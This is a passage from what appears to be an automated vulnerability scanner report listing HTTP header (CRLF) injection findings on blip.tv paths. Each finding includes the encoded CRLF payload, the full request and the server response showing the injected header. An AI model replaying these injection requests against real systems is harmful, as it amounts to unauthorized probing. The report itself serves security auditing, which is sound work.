<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/88e08
14a8636d647/">here</a
...[SNIP]...

2.12. http://blip.tv/comments/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /comments/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a449%0d%0a7d68a3963a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a449%0d%0a7d68a3963a7/?attached_to=post4658178&skin=rss HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7a449
7d68a3963a7
/?attached_to=post4658178&skin=rss
Content-Type: text/html; charset=iso-8859-1
Content-Length: 316
Date: Thu, 20 Jan 2011 00:39:05 GMT
X-Varnish: 1498222875
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7a449
7d68a3963a7/?attached
...[SNIP]...

2.13. http://blip.tv/dashboard [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8acb9%0d%0a3ad848a12d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8acb9%0d%0a3ad848a12d6 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8acb9
3ad848a12d6

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:57 GMT
X-Varnish: 344231869
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8acb9
3ad848a12d6">here</a>
...[SNIP]...

2.14. http://blip.tv/dashboard/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b22f%0d%0a6be6c81c81d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b22f%0d%0a6be6c81c81d/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/4b22f
6be6c81c81d
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1248910903
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4b22f
6be6c81c81d/">here</a
...[SNIP]...

2.15. http://blip.tv/dashboard/ads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ads

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53cde%0d%0aea424158b28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53cde%0d%0aea424158b28/ads HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/53cde
ea424158b28
/ads
Content-Type: text/html; charset=iso-8859-1
Content-Length: 282
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1025272120
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/53cde
ea424158b28/ads">here
...[SNIP]...

2.16. http://blip.tv/dashboard/ads [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ads

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d0a5a%0d%0a6568a4f142f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/d0a5a%0d%0a6568a4f142f HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/d0a5a
6568a4f142f

Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232288
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/d0a5a
6568a4f142f
...[SNIP]...

2.17. http://blip.tv/dashboard/distribution [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/distribution

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24319%0d%0ad78d94f4998 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24319%0d%0ad78d94f4998/distribution HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/24319
d78d94f4998
/distribution
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232175
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/24319
d78d94f4998/distribut
...[SNIP]...

2.18. http://blip.tv/dashboard/distribution [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/distribution

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 69b91%0d%0ae8f1812c081 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/69b91%0d%0ae8f1812c081 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/69b91
e8f1812c081

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1248910595
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/69b91
e8f1812c081
...[SNIP]...

2.19. http://blip.tv/dashboard/episodes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/episodes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ca8ba%0d%0a21bce5267e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ca8ba%0d%0a21bce5267e9/episodes HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ca8ba
21bce5267e9
/episodes
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:58 GMT
X-Varnish: 344232109
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ca8ba
21bce5267e9/episodes"
...[SNIP]...

2.20. http://blip.tv/dashboard/episodes [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/episodes

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d9997%0d%0a5d15dbd92b1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/d9997%0d%0a5d15dbd92b1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/d9997
5d15dbd92b1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1248910493
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/d9997
5d15dbd92b1
...[SNIP]...

2.21. http://blip.tv/dashboard/ftp/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ftp/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e70d7%0d%0ac59805585bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e70d7%0d%0ac59805585bf/ftp/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e70d7
c59805585bf
/ftp/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272433
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e70d7
c59805585bf/ftp/">her
...[SNIP]...

2.22. http://blip.tv/dashboard/ftp/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ftp/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 24217%0d%0a7d2bf5af83f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/24217%0d%0a7d2bf5af83f/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/24217
7d2bf5af83f
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 304
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272485
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/24217
7d2bf5af83f
...[SNIP]...

2.23. http://blip.tv/dashboard/players [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/players

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fadc6%0d%0a52a7d16e356 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fadc6%0d%0a52a7d16e356/players HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/fadc6
52a7d16e356
/players
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:58 GMT
X-Varnish: 1274886873
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fadc6
52a7d16e356/players">
...[SNIP]...

2.24. http://blip.tv/dashboard/players [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/players

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b9169%0d%0a744b6bd07a3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/b9169%0d%0a744b6bd07a3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/b9169
744b6bd07a3

Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/b9169
744b6bd07a3
...[SNIP]...

2.25. http://blip.tv/dashboard/stats [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/stats

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f9d9c%0d%0a0f7100e798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f9d9c%0d%0a0f7100e798/stats HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/f9d9c
0f7100e798
/stats
Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:39:02 GMT
X-Varnish: 344232691
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f9d9c
0f7100e798/stats">her
...[SNIP]...

2.26. http://blip.tv/dashboard/stats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/stats

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1a59b%0d%0acdc1632a28a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/1a59b%0d%0acdc1632a28a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/1a59b
cdc1632a28a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:39:02 GMT
X-Varnish: 1324533080
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/1a59b
cdc1632a28a
...[SNIP]...

2.27. http://blip.tv/dashboard/upload [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/upload

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 73508%0d%0a92f80fae78f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /73508%0d%0a92f80fae78f/upload HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/73508
92f80fae78f
/upload
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1274887304
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/73508
92f80fae78f/upload">h
...[SNIP]...

2.28. http://blip.tv/dashboard/upload [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/upload

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload efee6%0d%0a8d9e887dfe0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/efee6%0d%0a8d9e887dfe0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/efee6
8d9e887dfe0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1274887357
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/efee6
8d9e887dfe0
...[SNIP]...

2.29. http://blip.tv/dmca/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dmca/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3dd56%0d%0aac3f74482ba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3dd56%0d%0aac3f74482ba/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3dd56
ac3f74482ba
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:10 GMT
X-Varnish: 2146052427
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3dd56
ac3f74482ba/">here</a
...[SNIP]...

2.30. http://blip.tv/dtd/blip/1.0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ab0a%0d%0a59b45554341 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ab0a%0d%0a59b45554341/blip/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7ab0a
59b45554341
/blip/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 344235125
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7ab0a
59b45554341/blip/1.0"
...[SNIP]...

2.31. http://blip.tv/dtd/blip/1.0 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4a14c%0d%0a80f2ff6cb71 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dtd/4a14c%0d%0a80f2ff6cb71/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dtd/4a14c
80f2ff6cb71
/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 1025275088
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/4a14c
80f2ff6cb71/1.0">
...[SNIP]...

2.32. http://blip.tv/dtd/blip/1.0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f6e99%0d%0ad581e6a5fe4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /dtd/blip/f6e99%0d%0ad581e6a5fe4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/blip/f6e99
d581e6a5fe4

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:18 GMT
X-Varnish: 344235211
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/blip/f6e99
d581e6a5fe4"
...[SNIP]...

2.33. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92757%0d%0abadafac1cb4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92757%0d%0abadafac1cb4/mediaad/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92757
badafac1cb4
/mediaad/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
